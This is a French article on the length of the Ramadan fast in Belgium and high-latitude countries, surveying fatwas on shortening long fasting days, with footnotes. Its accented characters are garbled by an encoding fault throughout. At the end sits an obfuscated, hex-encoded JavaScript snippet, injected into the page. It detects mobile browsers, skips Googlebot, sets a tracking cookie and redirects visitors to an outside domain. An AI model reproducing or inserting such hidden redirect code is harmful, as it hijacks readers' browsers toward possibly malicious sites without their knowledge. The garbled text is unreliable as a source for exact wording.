En Belgique, la durA�e quotidienne du jeA�ne durant ce mois bA�ni de Ramadan 2017 (H. 1434) oscille entre 17 heures 40 minutes et 18 heures 20 minutes. Des lA�gA?res variations existent en fonction des villes (quelques minutes de dissemblance) mais les diffA�rences significatives trouvent leur origine dans la��absence de consensus en ce qui concerne les modes de calcul astronomique et dans des conflits politico-nationaux. Par exemple, une partie consA�quente de la communautA� turque suit les calendriers de la Diyanet[1] alors que la communautA� marocaine suit gA�nA�ralement da��autres institutions. Ainsi, des musulmans da��origine turque prennent encore leur sahA�r[2] alors que peut-A?tre leurs voisins de pallier jeA�nent dA�jA� depuis quasiment une heure. De mA?me, A� la��heure de la��iftA?r[3] da��aucuns, des autres perdurent encore volontairement A� la��A�tat de jeA�ne.

Actuellement, la pA�riode de jeA�ne est relativement longue dans un ensemble de paysA�europA�ens et nordiques. La durA�e des journA�es dA�passe largement celles de la pA�ninsule arabique. Sa��il est connu que les savants se soient positionnA�s au sujet du jeA�ne dans les pays oA? le soleil ne se couche pas, par contre, il est moins connu que des savants se sont A�galement positionnA�s sur les modalitA�s du jeA�ne dans les pays aux latitudes A�levA�es. Dans ces pays, les journA�es sont A�A�anormalementA�A� longues et la nuit est si courte qua��elle permet difficilement de combiner la��iftA?r, les priA?res de tarA?wA�h[4], al-qiyA?m al-layl (les priA?res nocturnes), A�ventuellement la��intimitA� conjugale[5], un sommeil suffisant et rA�parateur, une hydratation espacA�e, puis, finalement, le repas du sahA�r.[6]

PrA�cisons, avant de continuer, qua��il ne sa��agit aucunement, au travers de cette publication, da��inciter les croyants A� rompre le jeA�ne avant la��heure du maghreb, qua��AllA?h nous en soit tA�moinA�! Cette analyse ne fait que soulever des questions, et tente da��y rA�pondre. Il sa��agit da��un sujet qui a dA�jA� A�tA� traitA� par diffA�rentes instances religieuses, mais qui na��en reste pas pour le moins mA�connu a�� ou incompris a�� du grand public.

{Mangez et buvez jusqua��au moment oA? vous pourrez distinguer un fil blanc da��un fil noir, A� la pointe de la��aube. A� partir de cet instant, observez une abstinence totale jusqua��A� la tombA�e de la nuit.} (Coran, 2A�: 187)

Le verset semble clair et univoque, pourtant, les interprA�tations ont variA� au fil des siA?cles et cela dA�jA� depuis la��A�poque des compagnons.[7] Deux interprA�tations ont, par exemple, A�tA� donnA�es au A�A�fil blancA�A� et au A� fil noirA�A�, la��une littA�rale et la��autre symbolique.[8] La grande majoritA� sa��est appuyA�e sur un hadA�th[9] relatant le symbolisme da��une mA�taphore coranique alors qu’une minoritA� a affirmA� qu’il faudrait attendre l’aurore (moment oA? la luminositA� permet de distinguer la couleur d’un fil) pour commencer A� jeA�ner.[10]

Que disent concrA?tement les fatA?wA?[11]A�?

Il existe deux types de fatA?wA? bien distinctes sur le sujetA�: celles qui dispensent temporairement des personnes qui ne font pas partie de ceux qui sont exemptA�s (malades, voyageursa��) du jeA�ne de RamadanA�; et celles qui raccourcissent la durA�e des journA�es, considA�rA�es comme anormalement longues dans certains pays.

Le premier type dispense temporairement un individu responsable (mukallaf) a�� faisant partie des personnes soumises A� la prescription classique du jeA�ne a�� en raison da��une (insupportable) difficultA� qua��entrainerait le jeA�ne au cours des activitA�s indispensables A� sa stabilitA� A�conomico-socio-professionnelle. Ca��est ainsi que, lors de la derniA?re Coupe du monde, des footballeurs professionnels se sont vu accorder une dispense, mais aussi, que les A�tudiants franA�ais, lors des examens de juin 2016, ont A�tA� autorisA�s A� reporter leur jeA�ne. Cette derniA?re fatwA?, du Conseil ThA�ologique Musulman de France[12], se calque entre autres sur deux fatA?wA? similaires A�mises par la Maison Egyptienne de la FatwA? en 1951 et, plus rA�cemment, en octobre 2015, par le Conseil EuropA�en de la FatwA? et de la Recherche. Ce type de dA�cisions na��est pas unique dans la��histoire de la jurisprudence islamique, le grand savant shafA�ite Ibn Hajar al-HaytamA� (m. 974), le Sheikh hanbalite MansA�r al-BahA�ti (m. 1641) ainsi que le cA�lA?bre imam hanA�fite Ibn a�?AbidA�ne ash-ShamA� (m. 1836), autorisaient dA�jA� les personnes exerA�ant des mA�tiers pA�nibles A� ne pas jeA�ner durant le mois de Ramadan et A� rattraper les jours ultA�rieurement.[13]

Le deuxiA?me type de fatA?wA? a�� celui qui nous intA�resse plus particuliA?rement ici a�� concerne la��avancement de la��heure de la rupture du jeA�ne mais aussi, parfois, A�galement le retardement du sahA�r.

Exemple de calendrier allemand avec l’heure du iftA?r avancA�e

Alors que, au risque de nous rA�pA�ter, la mA�thode A� suivre pour jeA�ner dans les pays oA? le soleil ne se couche pas a A�tA� vite traitA�e, une question subsidiaire, pourtant tout aussi lA�gitime, a mis plus de temps A� A?tre traitA�e et a�� prA�cisons le sans rA�ticence a�� est loin da��avoir fait le consensus des savants. Qua��en est-il des pays aux latitudes A�levA�es oA? la nuit ne dA�passe pas une minute, et par extension, cinq minutes, une heure, trois heures ou mA?me cinq ? En da��autres termes, que faire pour les pays oA? la qualification de nuit peut A?tre considA�rA�e comme abusive en raison de son A�phA�mA?re rapport A� la durA�e totale de la journA�eA�?

Lorsque le soleil ne se couche pas dans un pays, il est nA�cessaire, pour pouvoir A�tablir les heures des priA?res et de jeA�ne, de se rA�fA�rer A� la��horaire du pays le plus proche ou, selon da��autres avis, A� celui des pays de la RA�vA�lation (laA� Mecque ou MA�dine), ou encore, au pays musulman le plus proche. Toutefois, aucun amA�nagement ne serait possibleA�si la nuit ne dure qua��une minute ou une heure ? Quelques minutes (ou quelques heures) changent-elles donc totalement la mA�thodologie A� suivre, alors que quasiment les mA?mes problA?mes demeurenta��[14] Curieux ! Est-cela as-sirA?t al-mustaqA�m (la voie droite, du juste milieu) prA?nA�e par la Sunna du ProphA?te (i�?) et par le CoranA�? Les avis divergenta�� Ces quelques questions, propres aux pays prA�cA�dant les latitudes polaires, lorsqua��elles sont sincA?rement posA�es, permettent de comprendre qua��un espace de rA�flexion relatif A� ce sujet est lA�gitime a�� voire indispensable a�� chez les savants.

Le monde peut A?tre divisA� en trois zones au Nord et au Sud de la��hA�misphA?re.

Zone 1A�: De la��A�quateur A� la latitude 42,5 (N et S).

Zone 2A�: De latitude 42,5 (N et S) A� la latitude 62,5 (N et S).

Zone 3A�: De latitude 62,5 (N et S) jusqua��au pA?le (N et S).

Alors que dans la premiA?re zone, les signes permettant da��A�tablir les heures des priA?res sont clairement visibles, dans la troisiA?me zone, ceux-ci ne sont tout simplement pas perceptibles. En effet, comment percevoir les signes permettant da��A�tablir la��heure des priA?res dans un endroit oA? le soleil ne se couche pas pendant six moisA�!? Il est alors fondamental de sa��appuyer sur les horaires rA�sultant des signes da��un pays extA�rieur A� la zone 3. En ce qui concerne la zone 2, celle-ci est quelque peu particuliA?re car par moments certains signes ne sont pas perceptibles. Par exemple, la��A�tA�, en Belgique, la��heure de la a�?ichA? (priA?re de la nuit) na��est pas visible. En consA�quence, une des cemaatler[15] turques prA�sentes sur le sol belge en a conclu a�� vraisemblablement A� tort a�� que cette priA?re ne devait dA?s lors pas A?tre effectuA�e A� cette pA�riode de la��annA�e.

Ayant connaissance de ces trois zones, des juristes de renom comme Mustapha Zarqa (m. 1999), Ali TantA?wA� (m. 1999), JA?d al-Haqq (m. 1996) et le Grand Mufti da��Egypte, Muhammed Abduh (m. 1905), estiment qua��A� partir de 45A�, il est tout a fait valide de suivre la��horaire des villes saintes de la rA�vA�lation (variant tout au long de la��annA�e entre 12 et 15 heures) ou de se calquer sur celui du pays modA�rA� le plus proche.[16] Lorsque les pA�riodes sont modA�rA�es dans les latitudes A�levA�es, il na��est raisonnablement pas sensA� de se rA�fA�rer aux deux autres options. Ainsi, il est possible de suivre la��A�A�A�horaire rA�elA�A� durant une partie de la��annA�e et de se calquer sur celui da��un autre pays uniquement, par exemple, pour les pA�riodes da��A�tA�.

{Nous vous [a��] dA�signA� votre sommeil pour votre repos et fait de la nuit un vA?tement, et assignA� le jour pour les affaires de la vie.} (Coran, 9A�: 11)

A�A�L’esprit du jeA�ne est clairement « du matin au soir » et se centralise sur les aspects intA�rieursA�A�, ainsi le verset ci-dessus fait mA?me dire A� certains savants que le jeA�ne devrait A?tre dA�placA� A� la nuit pour ceux qui travaillent de nuit a�� A�A�la nuit A�tant devenu le jour pour eux et inversementA�A�.[17] NA�anmoins, sa��agissant da��un autre sujet complexe sortant du cadre fixA�, nous ne le traiterons pas da��avantage.

Dans sa fatwA? du 1er de Ramadan 2014 (H. 1435)[18], le Sheikh Usama Hasan rapporte qua��en A�tA� les musulmans de SuA?de arrondissent la pA�riode de jeA�ne A� 14 heures. En effet, selon la logique mathA�matique, la durA�e moyenne da��une journA�e est de 12 heures et si, par prudence, la��on dA�sire y ajouter le temps thA�orique du lever et du coucher du soleil, elle atteint environ 14 heures. Selon un autre raisonnement, rationnel et analogique, sa��appuyant sur la��avis de la��Imam al-GhazA?lA� (m. 1111) qui dit que la nuit dure 8 heures, la journA�e ne peut durer que 16 heures. Pour ces raisons, le Dr. Hasan considA?re qua��une journA�e de jeA�ne dans les pays aux latitudes A�levA�es peut A?tre A�valuA�e A� une durA�e de 12 A� 16 heures. La journA�e de jeA�ne peut prendre cours avant le lever du soleil (selon la��avis majoritaire), pile au moment du lever du soleil (selon la��avis minoritaire da��Ibn Hazm et da��autres) ou A� la��heure habituelle A� laquelle la��individu prend son petit dA�jeuner, mA?me si celle-ci a lieu aprA?s la��heure du lever du soleil (par analogie A� la��approbation prophA�tique accordA�e A� Safwan ibn Mua��attal de dA�placer la priA?re du fajr afin de garder ses habitudes)[19].

Bien que ces avis puissent paraA�tre curieux, il est prA�fA�rable, voire indispensable, de ne pas A�mettre de jugements hA?tifs lorsque la��on ne possA?de pas la science requise. Ces avis ont A�tA� A�mis par des A�rudits musulmans et comme le rappelle A� la fin de sa fatwA? le Sheikh Usama HasanA�: les croyants doivent choisir la��avis qui sincA?rement les convainc. Que ceux qui veulent se conformer A� la pA�riode de jeA�ne telle qua��A�tablie par les calendriers classiques le fassent librement. Que ceux qui trouvent cela insurmontable ou qui sont convaincus par les avis susmentionnA�s concernant le raccourcissement de la pA�riode de jeA�ne dans les latitudes supA�rieures, jeA�nent en fonction des directives A�tablies A� ce sujet a�� fondA�es sur A�A�des fatA?wA? de juristes vieilles de plusieurs siA?cles pour les latitudes A�levA�esA�A�. Mais surtout, que personne ne se sente supA�rieur aux autres dans sa faA�on de jeA�ner et na��oublie que A�A�l’esprit du Ramadan et du jeA�ne comprend la conscience de Dieu, la patience, la persA�vA�rance, la gratitude, la priA?re, la��adoration, la charitA�, la gA�nA�rositA�, l’humilitA�, la purification de soi, le dA�veloppement personnel, l’aide aux autres, la misA�ricorde, la compassion, le pardon, l’abaissement du regard, le souvenir et l’amour de DieuA�A�.

 

[1] Administration turque des affaires religieuses gA�rant, en Belgique, les mosquA�es financA�es par la��A�tat turc.

[2] Le sahA�r est le repas que prennent les musulmans juste avant l’aube durant le mois de Ramadan.

[3] Repas marquant la rupture du jeA�ne.

[4] PriA?res, propres au mois de Ramadan, durant les quelles des grands extraits du Coran sont rA�citA�s. Leur durA�e dA�passe la��heure dans beaucoup de mosquA�es A� Bruxelles. Notons que chez les mosquA�es hanA�fites, ces priA?res sont moins longues (des petites sourates sont rA�citA�s voire simplement un ou deux versets) et tendent parfois vers ce que la��on pourrait nommerA�: la A�A�speed-salA?tA�A�, un sport national mois de Ramadan et dirigA� parfois par des A�A�jet-imamsA�A�.

[5] Ce qui nA�cessite de facto la prise des grandes ablutions et donc de temps.

[6] Na��oublions pas qua��il reste encore ensuite la priA?re du fajr, mA?me pour ceux qui qui doivent ensuite se rA�veiller A� nouveau vers 6h30-7h00 pour aller travailler ou se rendre en cours.

[7] At-TabA?rA� (m. 923) et Ibn KathA�r (m. 1373), bien qua��ils na��approuvent pas cette pratique, rapportent que le compagnon Hudayfa Ibn al-YamA?n mangeait jusqua��au lever du soleil et le juriste dhairite Ibn Hazm (m. 1064), connu pour son extrA?me littA�ralisme, approuve cette pratique dans son al-Muhalla.

[8] Les sunnites commencent le jeA�ne A� la��heure de la��imsak. A�A�La��imsak est un temps de prA�caution pour sa��arrA?ter de manger et de boire avant le fajr pendant les jours duA�jeA�ne. Ca��est donc un temps de prA�caution avant le fajr. Mais la��avis de plusieurs savants indique que le temps limite reste le temps du fajr.A�A� Horaires de priA?res pendant le Ramadan : A�clairages avec le Dr Ahmed Jabalah.A�http://www.les7defis.com/2015/04/horaires-de-prieres-pendant-le-ramadan-eclairages-avec-le-dr-ahmed-jabalah/)

[9] AdA�y Ibn HA?tim a dit : A�A�Quand fut rA�vA�lA� ce versetA�: {Il vous est permis de manger et de boire jusqu’au moment oA? vous pourrez distinguer un fil blanc d’un fil noir} (2A�: 183), j’allai prendre une entrave [corde] A� chameau noire, ainsi qu’une autre blanche que je plaA�ai toutes deux sous mon oreiller. Je me mis A� les regarder durant la nuit, mais sans pouvoir les distinguer. Le matin suivant, je suis allA� trouver l’EnvoyA� de Dieu et lui ai rapportA� la chose. a�?Cela, dit-Il, ne s’applique qu’A� la noirceur de la nuit et la lumiA?re naissante du jourA�!A�A� SahA�h al- BukhA?rA� [1916], voir aussi ahA?dA�th nA� 1917, 4509, 4510 et 4511.

[10] Par ailleurs, pour les chiites, A�A�la tombA�e de la nuitA�A� ne correspond pas A� la��heure de la priA?re du maghreb mais A� la��apparition de la nuit, environ une demi-heure aprA?s.

[11] Pluriel de fatwA?, avis juridico-lA�gal islamique A�mis par une autoritA� religieuse. Le pluriel de fatwA? est parfois francisA� en A�A�fatwasA�A�.

[12]FatwA? disponible surA�: https://m.facebook.com/ConseilTheologique/posts/1110484912358655

[13] Par analogie, la��A�tudiant peut-A?tre considA�rA� comme un travailleur (ou comme un futur travailleur).

[14] La longueur de la durA�e du jeA�ne et, en fonction que la nuit varie de quelques minutes A� quelques heures, la��impossibilitA� ou la difficultA� de concilier, comme cela a dA�jA� A�tA� mentionnA�, A�A�la��iftA?r, les priA?res de tarA?wA�h, al-qiyA?m al-layl, A�ventuellement la��intimitA� conjugale, un sommeil suffisant et rA�parateur, une hydratation espacA�e, avec, finalement, le repas du sahA�r.A�A�

[15] Cemaat est un mot turc signifiant communautA�, groupement, confrA�rie ou mouvement de pensA�e.

[16] La��avis da��Abduh est rapportA� dans son TafsA�r al-ManA?r. A�Pour plus de dA�tails, veuillez consulter la fatwA? du Dr. Usama Hasan (UK, 2014). http://www.musliminstitute.org/blogs/ramadan/fasting-during-long-days-summer

[17] FatwA? du Dr. Usama Hasan (UK, 2014).

[18] Ibidem.

[19] A�Dans un hadA�th sahA�h, il nous est rapportA� que la��A�pouse de Safwan sa��est plainte au ProphA?te (i�?) du retardement volontaire de son mari pour la priA?re da��al-fajr. Safwan se justifia en disant que son peuple ne se levait jamais si tA?t et le ProphA?te (i�?) lui rA�ponditA�: Dans ce cas, prie quand tu te rA�veillesA�! (! U?O�U� O�O?O?USU�O?O? U?O?O�O� / Fa-idhA? stayqathta fa-salliA�!). Sunan AbA� DawA�d [2459].

 

Calendrier disponible sur : http://rustukam.blogspot.be/2017/

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}